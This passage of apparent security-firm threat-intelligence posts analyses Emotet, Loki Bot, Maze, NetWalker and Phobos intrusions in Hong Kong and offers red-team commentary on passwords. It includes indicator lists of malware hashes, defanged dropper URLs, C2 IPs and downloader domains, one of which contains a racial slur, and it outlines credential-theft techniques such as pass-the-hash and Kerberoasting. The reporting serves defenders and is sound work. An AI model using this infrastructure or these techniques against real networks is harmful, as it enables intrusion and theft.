Similarly, data breaches can expose large amount of customer data and pose a significant threat despite the perceived lack of attackers’ sophistication. In September, a threat actor on a popular hacking forum released almost 3 million customer records from an online hospitality company with operations in Hong Kong, Singapore and Malaysia.[1] Although technical details of the breach are unclear, similar incidents often see criminals exploiting relatively unsophisticated techniques like SQL injections and exploitations of known vulnerabilities.

A thorough review of your online footprint and implementation of basic cyber security hygiene can help prevent such opportunistic attacks.

Conclusion and mitigation

The current situation of the COVID-19 pandemic affecting the globe has led to an uptick in cybercrime across all sectors. However, the ongoing sales and the coming Christmas season are likely to see retailers particularly targeted. Healthcare restrictions are forcing customers to rely on e-commerce platforms for purchasing products of all kinds.

With the holiday season coming into full swing, the amount of online purchases will likely to be at an all-time high. While there are clear opportunities for retailers to enjoy returns on a digital-focused business model, threat actors are also looking to exploit above mentioned techniques for their own malicious purposes.

Based on DarkLab’s experience in helping retail clients respond to network intrusions and uplift their security posture, we recommend organisations to:

  • Enforce Multifactor Authentication on all remote access services, including VPN, RDP and cloud environments.
  • Ensure ongoing visibility over all external-facing assets, and conduct regular vulnerability scan on external IP addresses.
  • Ensure mail filtering in place to block inbound email that fails SPF, DKIM, or DMARC checking.
  • Conduct regular security review of 3rd party code running on sensitive web pages like check out pages.
  • Enforce Content Security Policy to regularly review what domains can access your site and what resources they are allowed to load. This can help avoid Magecart exfiltrating customers’ data from your site.
  • Consider adopting compliance as code to ensure breaches of pre-established security measures are automatically detected and stopped.

Researching Emotet in Hong Kong

How spam campaigns can threaten regional transport hubs

Emotet is among the most widespread cybercriminal campaigns to date. Originally developed as a banking trojan to steal victims’ banking credentials, it eventually evolved in a vehicle to spread third party malware via large spam campaigns. Emotet developers have been collaborating for months with those of Trickbot and Qakbot to deliver ransomware, which means that an Emotet infection would likely lead to widespread system unavailability.

The most recent wave of Emotet emerged in July, and in September it was reportedly sending large amount of spam emails to Japan and New Zealand, among other target countries.  

DarkLab researchers found evidence that between August and September Emotet also targeted organisations in Hong Kong, a region previously unreported to be affected by this threat.

According to phishing emails uploaded to a popular malware repository, organisations in the retail, transport, and telecommunications sectors were among Emotet’s targets, although more companies are likely to have received their malicious emails.

Among the targets identified, particularly worrying is the presence of Hong Kong’s main airport. The organisation was very likely not compromised, or they would not have uploaded the phishing email to a malware repository, but as Emotet often leads to ransomware, a successful infection would have likely had serious impact on one of the largest airports in Asia Pacific.

Figure 1 – screenshot of Emotet phishing email to a Hong Kong victim

Attack chain analysis

DarkLab analysts observed that the emails were sent by Emotet’s epoch2 botnet, abusing or spoofing previously compromised organisations in other countries. The phishing emails contain MS Word attachments with relatively generic filenames such as invoice.doc and MJ-1759 report.doc. Upon opening the document, the user is enticed to click an enable content button, a standard technique to activate malicious macros.

Figure 2 – screenshot of MJ-1759 report.doc (MD5:e1b8b7b710a639b0697a5f3b5e6a00bb)

The heavily obfuscated malicious macros then load a base64-encoded Powershell script into memory, which is used to download an executable from one of seven hardcoded URLs. The use of multiple dropper sites is to ensure successful malware delivery even if one or more malicious sites are taken down

Figure 3 – decoded and partially deobfuscated powershell script reveals the dropper URLs (highlighted)

This first stage payload, which can have different names in different samples analysed, is by default saved in %TEMP%\APPDATA or USERFOLDER. When the first stage executable is run it gains persistence by copying itself in the system root folder with a different name, and by modifying registries entries to ensure that the process is run every time the endpoint boots up. The new executable in system root is the actual Emotet payload, named kbdrost.exe, and reaches out to a command and control server via a HTTP post request.

Figure 4 – Emotet’s connection to remote C2 IP following successful infection

According to previously observed behaviour, Emotet will eventually drop the Trickbot or Qakbot trojans, which will then deliver the Ryuk or Prolock ransomware respectively.

Emotet’s large spam campaigns and relatively sophisticated delivery mechanisms are likely to continue to pose a threat to companies in Asia Pacific in the foreseeable future. DarkLab’s discovery of Emotet’s targeting of Hong Kong organisations shows how companies in the region should maintain awareness of global threat trends to ensure effective network defences and a proactive approach to cyber security.

Indicators of Compromise

The following IOCs relate to the samples analysed, include the hardcoded C2 IP addresses. However, Emotet’s attack infrastructure changes rapidly. We suggest readers to refer to Cryptolaemus’ daily IOC lists for an updated and comprehensive overview of Emotet’s infrastructure.

FilenameSHA-256 Hash
MJ-1759 report.doc5a378819ab9e17bc93ed9c3d01b31f2b1ff6c39cb3cbaff66933fe096a527450
kbdrost.exe9f9ac55291000f55721ff0fcf8fd421d94eb0e2f0259c161a8d17b2cb0894fa0
Executable dropper URLs
hxxp://haymetetrading[.]com/wp-includes/yGELKj4/
hxxp://simofferbd24[.]com/wp-includes/fsiQc/
hxxp://401kplansinfo[.]com/cgi-bin/KtFRk/
hxxp://fidelityguide[.]com/cgi-bin/VA/
hxxp://sirnakmidyeci[.]com/wp-includes/qk9wW2/
hxxp://subitocarne[.]com/wp-content/ByeOAt9/
hxxp://eliesalibaarchitect[.]com/wordpress/T/

C2 IPs

24.43.32.186:80176.111.60.55:8080121.124.124.40:708075.139.38.211:80
38.111.46.46:808024.137.76.62:8089.216.122.92:8082.225.49.121:80
134.209.36.254:808037.187.72.193:808082.80.155.43:80123.176.25.234:80
162.241.242.173:8080110.145.77.103:8047.144.21.12:443194.187.133.160:443
74.120.55.163:80153.137.36.142:8093.147.212.206:8062.30.7.67:443
61.92.17.12:801.221.254.82:80200.123.150.89:443109.74.5.95:8080
219.74.18.66:443195.7.12.8:80121.7.127.163:80203.153.216.189:7080
156.155.166.221:80110.5.16.198:80200.114.213.233:8080187.161.206.24:80
104.131.44.150:8080110.5.16.198:8094.200.114.161:80157.245.99.39:8080
37.139.21.175:8080185.94.252.104:44324.179.13.119:80195.251.213.56:80
94.1.108.190:443104.236.246.93:808084.39.182.7:8071.72.196.159:80
169.239.182.217:808078.24.219.147:808097.82.79.83:80174.102.48.180:443
220.245.198.194:8085.152.162.105:8087.106.136.232:8080181.169.34.190:80
139.99.158.11:44385.105.205.77:80805.196.74.210:8080140.186.212.146:80
91.211.88.52:7080139.59.60.244:80805.196.74.210:8080201.173.217.124:443
62.75.141.82:8079.137.83.50:44324.43.99.75:8042.200.107.142:80
174.45.13.118:8050.91.114.38:80213.196.135.145:8079.98.24.39:8080
137.119.36.33:80172.91.208.86:8094.23.237.171:4435.39.91.110:7080
188.219.31.12:8074.219.172.26:8074.134.41.124:80139.162.108.71:8080
103.86.49.11:808083.169.36.251:808096.249.236.156:44374.208.45.104:8080
104.131.11.150:443153.232.188.106:8095.213.236.64:808061.19.246.238:443
124.41.215.226:80209.141.54.221:8080137.59.187.107:808050.35.17.13:80
78.187.156.31:80168.235.67.138:7080137.59.187.107:808095.179.229.244:8080
104.32.141.43:80139.130.242.43:80137.59.187.107:8080216.139.123.119:80
107.5.122.110:8068.188.112.97:80219.75.128.166:80120.150.60.189:80
87.106.139.101:808087.106.139.101:8080

A tale of two hacks

A case study in structured intelligence analysis

In recent weeks DarkLab helped a large international company conduct a threat hunting exercise in their infrastructure following a network breach.

The initial investigations revealed that threat actors infiltrated the network using legitimate and likely stolen credentials on a Citrix server hosted in a European subordinate of our client. From there, however, the DarkLab team discovered two sets of activities. One led to the exfiltration of large amount of data, another one to the deployment of the REvil ransomware, also known as Sodinokibi. We previously reported on how ransomware operators are increasingly stealing data from their victims to threaten its release if their ransom demands are not met. It seemed therefore possible that the two sets of malicious activities were carried by the same threat actor.

Indeed, the initial entry point was the same, and the stolen data was uploaded to Mega, a popular data hosting site previously used by REvil operators. However, some other aspects of the malicious actions did not add up. For instance, data was exfiltrated weeks after the ransomware was deployed, which would have been inconsistent with previously observed tactics, techniques and procedures (TTPs) of ransomware operators. Also, the activities that led to ransomware deployment and those that ended up stealing data exploited commonly used but different toolsets. While in one incident Cobalt Strike was used as the attacking tool on day one, the other set of activities involved PSExec the day after. Since Cobalt Strike has a Psexec built-in we started doubting whether the two incidents were carried out by the same hacker.

Assessing pieces of conflicting evidence can be messy and potentially lead to the wrong conclusion. In order to analyse existing evidence in an unbiased and objective manner, DarkLab analysts resolved to employ a traditional intelligence analysis technique used by intelligence professionals since the 1960s. Despite its age, the Analysis of Competing Hypothesis (ACH) remains a useful framework to answer difficult questions in a way that removes analyst’s potential biases or misconceptions.

Our analysts created a table like the below, where pieces of evidence are given a credibility and relevance score, before evaluating their consistency with different hypothesis. The hypothesis with the highest score is considered the most likely.

In our case we considered the following hypothesis:

H1: Incident 1 and 2 were carried out by the same attacker

H2: Incident 1 and 2 were carried out by two different attackers

H3 Incident 1 and 2 were carried out by more than two attackers

Fig 1 – ACH table

By considering the evidence collected as consistent (C), not applicable (N), or inconsistent (I) with each of the hypothesis, a final score is calculated. H2 scored the highest
indicating it was clearly the most likely hypothesis. This suggested that indeed different threat actors were separately involved in the ransomware deployment and data exfiltration.

In this way, we were able to use a fact-based, objective analysis of the available intelligence to our advantage in a live threat hunting exercise. In particular, our threat hunting team was able to treat the incidents as separates, with significant implications for their efforts in detecting and mitigating the breaches.

Further details on the incidents

Our forensic investigation identified how the ransomware attack lasted a total of five days, while the threat actor that stole the data was able to remain undetected in the network for almost six weeks. In both cases, the number of hosts compromised was significant and threat actors were able to move across different countries’ networks without being detected.

The REvil operator used the legitimate remote access solution AnyDesk as a backdoor, and eventually deployed the ransomware to over 1000 servers and workstations in Hong Kong and the UK. Ironically, the ransomware interfered with the callbacks the second attacker had already established on 10 machines. All their established call-back connections on the compromised servers were gone after the ransomware attack. They were therefore forced to restart from the initial compromised Citrix server in the UK. From there, they used Cobalt Strike for lateral movement and privilege escalation on multiple accounts in Hong Kong, US, and India. This second attacker collected hundreds of gigabytes of data from different servers, staged them internally, comprossed them, and eventually uploaded them to a Mega cloud server.

Mitigation

The presence of two separate attackers within the network of a large conglomerate indicates the significant challenges that large organisations with tens of thousands of endpoints can face. Deploying standard policies on such a large estate can be challenging, but we strongly suggest organisations to:

  • Enable Multi-Factor Authentication (MFA) for all remote access
  • Enforce strong password policies, proper Active Directory-based mechanisms, or a managed password solution to protect Domain Administrators account
  • Tighten cloud file storage usage, some solutions offer built-in micro segmentations that can help prevent attackers accessing your data
  • Consider employing Managed Detection and Response services to automatically and proactively mitigate threats in a 24/7 manner

Indicators of Compromise

Host-based

FilenameMD5Description
payload.txtf5dd8644b011a6ecaf405ee9bc5c6852Cobalt Strike implant callback
beac.exe500286eaf9eb11b34eb413bb0df5543bCobalt Strike implant callback
55.exe500286eaf9eb11b34eb413bb0df5543bRansomware
Beta.exe90e6ea15ed18005b431e135186d57abfRansomware

Network-based

ValueDescription
82.31.145[.]121Infiltration IP
94.7.101[.]89Infiltration IP
158.174.247[.]194Infiltration IP
212.80.217[.]174Call back IP
51.83.165[.]21Call back IP
fairyschool[.]artC2 domain for baec.exe

You Shall Not Pass(words)

A red teamer’s perspective on what is wrong with passwords, and how to make it right

“Your passwords are weak” is one of the most common observations that we find ourselves making in our red teaming work. It is often surprising to organisations. Our clients’ passwords meet their formal complexity requirements. However, a password compliant to password policies is not necessarily a strong password. Password policies are usually designed with respect to the available compliance features in Windows. Some of these, like the 20 years old Windows’ Password Complexity, are quite updated.

In the course of one red team engagement our offensive security professionals can encounter hundreds of weak passwords. Weak passwords allow hackers to infiltrate your network and to move laterally in your environment. In this article, we draw from our offensive security experience to illustrate common misconception about passwords, and what companies should do to enforce stronger ones.

Beyond a lengthy and repetitive approach

In 2017 the NIST Special Publication SP800-63-3 introduced an interesting concept, that complexity requirements and expiry dates are not necessary, and not effective, for memorised secrets like passwords.

This was published at a time where most security control guidelines still required corporate users to use complex passwords and change them periodically, sometimes as often as every month. Instead, NIST encouraged a new approach including using multi-factor authentication solutions wherever possible and checking passwords against dictionary lists, among others.

Microsoft has since implemented some of these suggestions within the Windows platform. From our experience, however, most organisations in Hong Kong and Asia Pacific still lack a full understanding of some of these technologies to apply them effectively. The first misconception is that short passwords and PINs are weak. This is an over-simplification of how security works. The strength of a password should be assessed alongside its potential exploitation techniques.

Length does not always matter

One example is the use of Windows PINs compared to Windows domain passwords. Their requirements should be different because their potential attack vectors are as well. While hashes of Windows passwords can be downloaded and bruteforced offline, PINs cannot. Also, PINs have a much smaller attack surface compared to a domain password.

Windows domain passwords are one of the most common ways to gain access to a target network and its resources in a Windows environment. Domain passwords must be complex because attackers can abuse each one of them at different points of a corporate network. For instance, during red team engagements we can typically conduct password spraying with a standard set of user passwords within the local network and sometimes against remote applications, such as Outlook Web Access. We can also leverage Windows functionalities to obtain password hashes, via Kerberoasting or LLMNR poisoning for instance, which we can then to decrypt by cracking them offline. Strong and complex passwords would be much harder, if not impossible, to crack and would be harder to guess in a password spraying attack.

On the contrary, a Windows PIN can only be used on a single Windows machine, and an attacker can be further slowed down by introducing a delay between failed attempts.

Does a long, complex PIN make sense in this case? A 12-character, complex Windows PIN which can only be entered (and therefore attempted by the attacker) on a physical machine is unnecessary. From a red teamer point of view, a 6- to 8-character PIN is sufficient for a Windows PIN environment.

While it takes only a few hours to bruteforce a hashed 8-character Windows password offline, it takes much longer to test potential PINs on premises on a Windows machine. Also, bruteforcing PIN is not practical because the TPM Anti-Hammering protection locks a PIN attempts for 24 hours after 32 wrong attempts. This is summarised in the graph below.

Therefore a Windows PIN, or any PIN tied to hardware devices like iOS devices:

Does not require length and complexity

Does not require frequent expiry dates

Bypassing passwords

There are other authentication solutions other than passwords and PINs. Some organisations use smartcards, which seem like an elegant solution. In effect, the “PIN” that users enter would unlock the content of the smartcard, which can subsequently be used to connect to domain resources.

The problem often lies with the implementation of these solutions. In most situation, the smartcard stores a NTLM hash that is unlocked by the user’s PIN. This NTLM hash is randomly generated and complex enough for it not to be cracked into cleartext format. However, the system never changes this NTLM hash which can therefore be used directly to authenticate to Windows domain resources via pass-the-hash. If this NTLM hash is compromised, it would allow persistent access by attackers for a long time.

For us red teamers, one way to get these hashes is via Net-NTLMv1 hashes that some organisations still use. NetLMv1 can be directly converted into NTLM, which can then be used for pass-the-hash activities. This is because Net-NTLMv1 relies on 3 separate DES encryptions, which can be cracked separately back into NTLM format due to their weak encryption algorithm.

Another solution to move beyond password authentication is Windows Hello for Business. This Microsoft solution would supposedly allow businesses to move into a password-less environment. In a nutshell, a Windows Hello for Business PIN or biometric authentication would unlock the credentials (stored as certificates or keys) within the PC. We have yet to see widespread adoption Windows Hello for Business though.

Trust but verify

For those of us that must still rely on windows domain passwords, an important addition would be to introduce a password checking process. Most organisations do this via complexity requirements built-in to Windows.

As our reader may have guessed by now, complexity requirements are not enough. Consider the following “strong” passwords that meets Windows complexity policies:

  • P@ssw0rd
  • P@$$w0rd
  • Username!July
  • July!2020

From an IT security controls or compliance person, these are good passwords that meet policy requirements. From a red teamer perspective, these are all very weak passwords.

From our experience, at least 70% of all passwords within an organisation are similarly weak passwords that nonetheless comply with password policies.

The problem could be addressed by increasing the complexity required by password policies. However, this would likely increase users’ frustration while not necessarily making life harder for an attacker.

To ensure that systems are secured with stronger passwords, organisations need a solution that takes into considerations real world scenarios. Consider a password audit exercise, which checks your users’ new and existing passwords against a list of:  

  • Known passwords from leaked data breaches
  • Most commonly used passwords
  • Passwords that contain references to the organisation, username, etc.

Fortunately for Windows users, such a functionality is provided with an Azure AD subscription.

For companies that do not use Azure AD, DarkLab also offers a solution with similar functionalities that relies on password blacklists from our Threat Intelligence practice.

Whatever solutions you choose, remember the key concepts we went through:

  • Longer is not always better
  • PINs are better than passwords
  • Passwordless solutions must be correctly implemented
  • Perform a password audit by checking your passwords against a blacklist, without adding unnecessary complexity!

Phishing Vessels

Loki Bot campaign targets maritime industry

DarkLab intelligence analysts detected a Loki Bot phishing campaign targeting the maritime and engineering sectors in Europe, Asia and the US from spoofed email addresses of legitimate organisations in Asia.

Figure 1 – Countries of origin of phishing recipients (blue) and legitimate organisations’ spoofed addresses (red)

Recipients of phishing emails – hard to see in the map above – were also located in Singapore.

The earliest phishing email detected dates back to October 2019. However, our previous research indicates that this threat actor is using maritime themes in their phishing campaigns since at least 2018, and is linked to other malware families including Pony.

The 2019 email was sent from a likely compromised subdomain of an Indonesian company and contained a malicious archive (.rar) attachment purportedly pertaining to a purchase order, a common theme of spam emails.

Since then, the actor behind the campaign refocused their phishing lures by spoofing emails of legitimate organisations linked to the maritime industry, and by referring to vessels and other naval themes in their emails.

Figure 2 – Example of phishing email spoofing a Singapore-based shipping company

Figure 3 – Example of phishing email sent to a Switzerland-based maritime consultancy

Some phishing emails showed a good knowledge of the shipping industry, including believable details of existing ships and ports locations.

Figure 4 – Example of phishing email sent to a Japanese shipping company

Figure 4 – Example of phishing email sent to an Italian engineering contractor, purporting to be from a Chinese port authority

For instance, both vessels mentioned in the email above, Glovis Crown and Glovis Splendor, are 200m long cargo ships registered in the Marshall Islands. It remains unclear how criminals managed to obtain such details, although it seems likely that they derive from previously hijacked communications of potentially unrelated victims.

This second wave of phishing emails has been active between February and late June 2020, suggesting the campaign is likely still active.

Phishing emails switched to a malicious Microsoft Excel (.xlsx) attachment containing an exploit for CVE-2017-11882. This vulnerability in Microsoft Equation Editor lets attackers run remote code on a vulnerable machine when the victim opens a document. The exploit has been actively used by multiple cybercriminal groups due to the level of access it grants to the victim machine and the lack of user interaction needed.

Figure 5 – Screenshot of malicious xlsx attachment to email in Figure 4 [MD5: e7bb1284bf0e723b47435b0f70504b3f]

The malicious documents are downloaders for Loki Bot, an information stealer first seen in 2015. The malicious payloads observed, and additional ones found by pivoting on the attack infrastructure, are downloaded from duckdns.org subdomains likely created with domain generation algorithms (DGA).

The payload, Loki Bot, can steal credentials from browsers and email clients, among other programs, and has keylogging capabilities. The malware also sends identifying information about the victim’s hosts to a C2 to inform threat actors of the successful infection.

The current Loki Bot campaign highlights the ongoing threat of commodity malware and widespread phishing to organisations in the maritime and engineering sectors. Although the campaign exploits well-known threat vectors, lack of widespread adoption of anti-spoofing technologies like SPF and DMARC, or their incorrect implementation,  means that criminals can continue sending credible phishing emails apparently from legitimate domains.

Indicators of Compromise

Emails Sender’s IP

103.253.115[.]37

Downloader Domains

russchine2specialplumbingwsdymaterialgh3.duckdns[.]org

chneswealthandorganisationstdy7joppl.duckdns[.]org

12chnesstdywealthandmoduleorganisationrn.duckdns[.]org

chnes14wealthandstdymoduleorganisationoo.duckdns[.]org

chnthreewealthsndy3andreinforcementagenc.duckdns[.]org

20chneswealthandsndymoduleorganisationvz.duckdns[.]org

chnes29sndyqudusisabadassniggainthebba.duckdns[.]org

united32wsdyfrkesokoriorimistreetsjkjd.duckdns[.]org

russchine2sndymapanxmenischangedone14ajb.duckdns[.]org

sndychnesprvlandofglorylandoflifeforle.duckdns[.]org

greenpegheedahatakankeadeshnaajaotawsdy.duckdns[.]org

sndychnesprvlandofglorylandoflifeforle.duckdns[.]org

Payloads

4ae5c9c199377980ebc558d27e7855960c69167138951378666421b9b3db09de

bcc826091ec71230947aa1916263434935a58ffe5977cf415b1d970633939652

58e0c4eef4236380167e9ea679e7885aebb5319dd0ea17365b90b5867cae7ff8

49107c228e38638d3b241bb5c4aa93ef68db20cc0c5a4157e00fc027635418bf

9ea2966982206d42cd8ad215f7a408bf7c1964134e3bef967e7bb93df6dc1f1a

b48f93828a970b7f2122b098cade1e1ab488ef557cf11ae0c44f5690f6c45185

83ba255722d5c337ce128b5e216fc1a4010849b3b4ac3e4841458d371ed757d6

Crypt ‘n’ Leak

New ransomware trend exploits vulnerability in Hong Kong’s VPNs

The fast pace of criminals’ innovation is an ever-recurring theme in cyber security. When the cybercriminal underground economy is particularly saturated, threat actors will likely be driven to explore new ways to differentiate their offering in the illicit cybercriminal market and increase revenue. This is what we are currently observing among ransomware operators. Many ransomware variants have been released in recent years. In the last several months, however, a smaller group of ransomware-as-a-service providers emerged with new a tactic to extort their victims.

DarkLab’s Threat Intelligence team is currently tracking multiple ransomware groups that, in addition to encrypting victims’ data, also steal sensitive files and threaten their public release if ransom demands are not met. The extortionists’ goal is to apply additional pressure on victims by threatening reputational damage and potential regulatory fines if sensitive data is leaked, on top of hindering systems availability.

DarkLab incident response team has observed multiple such incidents affecting Hong Kong organisations, highlighting how ransomware leak attacks are a significant and current threat for companies in the region as well as globally. DarkLab has experience in dealing with Maze and NetWalker ransomware attacks in Hong Kong. This article aims to first shed light on each malware’s background, and then to discuss some of the tactics, techniques, and procedures (TTPs) we observed in our incident response investigations.

The RaaS model and its implications

Maze and NetWalker ransomware variants are developed by a core group of cybercriminals and then leased to other criminal operators, called affiliates, on deep and dark web forums. This model is usually referred to as ransomware-as-a-service (RaaS), where operators and developers share profits in an agreed percentage.

RaaS means that different operators of the same ransomware group can target multiple companies at the same time, regardless of their size or geographical location. Ransomware operators are independent actors, so they may differ in the attack tactics exploited. This makes the job of network defenders more challenging because of the larger set of potential tactics, techniques, and procedures (TTPs) to mitigate.

Some RaaS developers, like those of NetWalker, only accept affiliates with proven technical skills and existing access to multiple corporate networks. Stricter cybercriminal candidate screening is leading to an increase in targeted ransomware attacks exploiting external network systems. Exposed remote desktop protocol (RDP) and vulnerable internet-facing services are increasingly more likely entry points than untargeted phishing emails.

The rise of crypt and leak

Since the end 2019, some ransomware groups have begun threatening to release sensitive victim’s data if their ransomware demand are not met. Maze went a step further and set up a dedicated website to publicly shame victims and leak data. More groups, including NetWalker, are now maintaining their own leak websites on the clearnet or on tor hidden services. DarkLab is currently tracking 13 ransomware leak websites, highlighting the rapidly increasing scale of this crypt and leak trend.

This new pressure tactic by ransomware operators has significant implications for companies. Previously, an efficient back-up policy would potentially guarantee a timely recovery from ransomware attacks. Now that ransomware groups also leak data, back-ups are not enough anymore. Organisations must ensure that sound cyber security hygiene is maintained at all times to prevent a ransomware intrusion from taking place at all.

Maze

Maze ransomware appeared in May 2019, but it began leaking victim’s data only in 2020. The group maintains two sites, one to publish victim data (see figure 1), the other to communicate with its victims and let them decrypt some test files (see figure 2). Both have a back-up tor hidden service counterpart to avoid take down by law enforcement.

Figure 1 – redacted screenshot of Maze ransomware leak site

Figure 2 – Screenshot of Maze ransomware chat site

Figure 3 – Geography of Maze’s victims posted on their site

Figure 4 – Sectorial breakdown of Maze’s victims posted on their site

NetWalker

NetWalker ransomware is based on a previous variant called Mailto and was rebranded in its current name in March 2020, despite little change in its code. The developers of NetWalker recruit affiliates on Russian-language cybercriminal forums and particularly look for individuals with network intrusion experience. The group has allegedly been very successful since its inception. NetWalker developers claimed to have gained millions of US dollars since March, although it remains unclear whether this is just an exaggeration to attract more affiliates to their program or not.

NetWalker also operates a website that lists their victims and leaks their data. We noticed that the group behind NetWalker selectively deletes victims’ entries from their website overtime, so the range of targeted organisations is likely more extensive than that presented in the graphs below.

Figure 5 – Redacted screenshot of NetWalker ransomware leak site

Figure 6 – Geographical breakdown of NetWalker’s victims posted on their site, more have likely been targeted and not posted online or deleted from existing victims’ list

Figure 7 – Sectorial breakdown of NetWalker’s victims posted on their site, more sectors have likely been targeted

Observed tactics, techniques, and procedures

DarkLab incident response investigations found that operators of both Maze and Ransomware exploited a known Pulse Secure VPN vulnerability – CVE-2019-11510 – to gain initial access to victims in Hong Kong. The same vulnerability has been exploited by multiple ransomware groups against other high profile targets, including by Sodinokibi against Travelex in January.

In both cases, the remote access technology SSLVPN was Active Directory (AD) authenticated, giving attackers a legitimate network account early on in their intrusion. Once inside the victim’s network, the attackers would conduct enumeration and other reconnaissance activities by, for instance, searching for password files in share folders. The attackers will also actively look for idle and vulnerable servers with intentions to expand their foothold.

During our investigations we found that both intruders used common hacking tools, although with some differences. Tools observed include windows administration tools like psexec, open source tools for lateral movement like crackmapexec, PowerShell versions of Mimikatz and PowerView for credential theft, further enumeration and privilege escalation, as well as off-the-shelf network scanners. 

The Maze and NetWalker operators eventually managed to obtain access to administrator accounts, which allowed them in both cases to disable anti-virus solutions on network end points. Similarly, creation of new domain administrator accounts allowed them persistence on the network. 

From such privileged positions the operators staged malware and other required artefacts on accessible locations in the victims’ networks, such as shared folders – for NetWalker – and NETLOGON folders – for Maze. We suspect that in both incidents scripts were used to automatically spread the ransomware in the network.

In the case of Maze, the deployment script would also disable endpoints’ protection software, and enable services, such as Windows Remote Management, that would allow re-entry. Maze operators also abused group policy objects (GPOs) to weaken their endpoint defences by changing configurations, and to redeploy the malware to new machines. The latter would ensure that the ransomware would also spread to endpoints after they shut down or if they joined the network at a later time.

Conclusion

The double extortion of crypt and leak groups and the growing trend of targeted attacks against external network infrastructure makes ransomware leaks one of the most significant threats to companies, regardless of sectors. The recent targeting of Hong Kong organisations by Maze and NetWalker also reaffirms how the SAR’s threat landscape is closely associated with threat trends worldwide.

Companies in Hong Kong should therefore adopt a proactive approach to review their security posture and avoid targeted network intrusions in the first place. Presence of timely back-ups can help restore system availability but it is not an effective mitigation against the increasing threat of ransomware data leak. Organisations should also focus on maintaining situational awareness on developments in the global threat landscape, as threats to companies abroad are likely to quickly become threats to Hong Kong organisations too.

Indicators of Compromise

HashFile nameDescription
c45ebccb7dc2bbc34c51c82c3eba6448apply.ps1Generates GPO package to disable AV, settings
16b5ddd25bb610270e52c1663931ef4csystem.dllMaze ransowmare
0e7d5d16e03393605f5f4862f1b9cc37crackmapexec.exeLateral movement tool
d6a246a98a0387e2a5f9d95ddd8ae164syspool.exeLightweight network scanner
696bb8648eceaa187cbc1f06205a23cecity.exeNetWalker ransomware
84ddf23d4307b1a9989352f4845d0edecity.ps1NetWalker PowerShell script

Phobos ransomware

Incidents affecting Hong Kong organisations

In the last two months DarkLab Incident Response and Threat Intelligence teams observed multiple incidents in Hong Kong involving the Phobos ransomware variant.

There is no explicit indications that these incidents are part of a campaign targeting Hong Kong. Rather, they are likely due to Phobos’ prevalence in the cybercriminal underground. Nonetheless, the similarities in observed tactics, techniques and procedures (TTPs), and in the ransomware deployed prompted us to release this alert to help companies improve their timely detection and response to this threat.

Intrusions analysis

Phobos shares many similarities with the Dharma ransomware, and has been sold as  ransomware-as-a-service on the cybercriminal underground since at least December 2018. This means that even low skilled threat actors can rent the malware from its developers and spread it via whatever means they have access to. 

According to our DarkLab’s incident investigations, exploitation of remote desktop protocol (RDP) servers and their credentials are the most common infection vectors. In particular, we observed RDP bruteforcing and exploitation of weak password policies as the most frequent attack vectors. Such TTPs match previously reported instances of Phobos intrusions worldwide.

Once inside the victims’ network, we have seen criminals creating a local account with netplwiz, deploying a malicious network share scanner called 5-NS new.exe, and deleting event logs prior to executing the main payload.

Several hours after the initial intrusion threat actors triggered the ransomware in the form of a malicious executable. Other than encrypting the files, the ransomware also tampered with infected hosts to disable the firewall and other security configurations.

Conclusion

Attackers did not employ particularly sophisticated tradecraft and PwC was able to help clients contain the incidents quickly. Nonetheless, the intrusions impaired systems availability and created operational disruption among victim companies. This can be particularly damaging when most organisations’ staff connect remotely to the corporate network due to the COVID-19 pandemic.

Recommendations

To protect against ransomware incidents via RDP exploitation, DarkLab recommends companies to:

  • Ensure visibility over public-facing RDP servers via external scans
  • Limit exposure of public-facing systems whenever possible
  • Enforce use of multi-factor authentication for remote access, particularly RDP
  • Ensure your organisation has and follows an effective back-up policy
File NameMD5Description
20.09.2019Taskmgr.exeb8351ba02dbce02292a01a6e85112e2bPhobos ransomware
Mouse Lock_v22.exefc9c80e1767e1266056b1b2c89a74ce5Blocks mouse cursor on screen
5-NS new.exe597de376b1f80c06d501415dd973dcecNetwork shares scanner

Cyber threats to Hong Kong

An incident response perspective

In the last two years, DarkLab has helped clients respond to, and recover from, numerous network intrusions. Our clients span a variety of sectors in Hong Kong and Macau, including financial services, real estate, telecommunications, and aviation, among others. The organisations we helped also varied greatly in size and cyber security maturity. Some employed just a handful of personnel with no dedicated security function, while others were large international organisations with an established CISO and security teams.

This range of incident response experience means that DarkLab is in a unique position to identify cyber threats to Hong Kong companies across multiple sectors. In this article, we share some of the threat trends we have observed first hand, and highlight effective mitigation methods companies can implement to thwart them.

Common attacks against companies in Hong Kong

In 2018, we were called in to help investigate a significant number of business email compromise (BEC) frauds against financial services companies. BEC frauds see threat actors sending emails to employees, often in the finance department, to instruct them to direct funds to a bank account that scammers control. For the fraud to work, the email needs to appear to originate from an internal, trusted email account.

While email spoofing is the simplest option for threat actors, in most of the incidents we observed threat actors instead directly compromised an email account. This allowed them to monitor their victim’s incoming emails and hijack an email thread to grant their fraudulent request greater credibility. While BEC scammers usually spent no more than a couple of days in their victim’s accounts, we saw one incident where their presence remained undetected for almost a week.

In 2019, the most common type of attacks were ransomware and cryptomining. Cryptomining incidents were mostly caused by automated botnets. Intrusions were often detected promptly by victims due to the unusually high CPU usage required to generate cryptocurrency.

Ransomware attacks instead showed a higher degree of stealth and manual lateral movement. For instance, in a ransomware intrusion attackers operated in the infected network only outside standard office hours. By also exploiting living-off-the-land techniques intruders managed to remain unnoticed until the encryption routine was activated some 20 days later.

Threat intelligence suggests that last year ransomware and cryptomining threats were on the rise globally, showing how threats to Hong Kong closely follow global threat trends.

Main initial attack vectors exploited

The initial attack vectors for most incidents we investigated were abuse of internet-facing infrastructure, often exploiting brute-force attacks or stolen credentials to access servers with enabled remote desktop protocol (RDP) and secure shell (SSH).

For instance, a client in the shipping industry had ten servers infected by the Anacron cryptomining malware. Upon investigation, we discovered attempted bruteforce attacks against the same SSH server for almost a month, suggesting automated botnet activity. Once logged in, the malware spread to 10 additional servers that shared the same password as the infected web server.

Ransomware infections that initiated on a public-facing RDP server were also relatively common. For instance, we responded to one such incident involving the Dharma/Crysis ransomware that was affecting a real estate development company.

In at least one case, however, a publicly available exploit enabled a ransomware attack against a company in the professional services sector. Attackers exploited a known vulnerability in Windows IIS (CVE-2017-7269) to gain initial access to a server used for testing, which was left exposed to the internet. After stealing multiple IT user accounts with the highest privileges, the attacker compromised and encrypted 62 Windows servers causing significant business disruption.

Espionage intrusions against organisations in Hong Kong

Although less numerous, we also witnessed prolonged and organised network intrusions against companies in Hong Kong carried out by skilled threat actors.

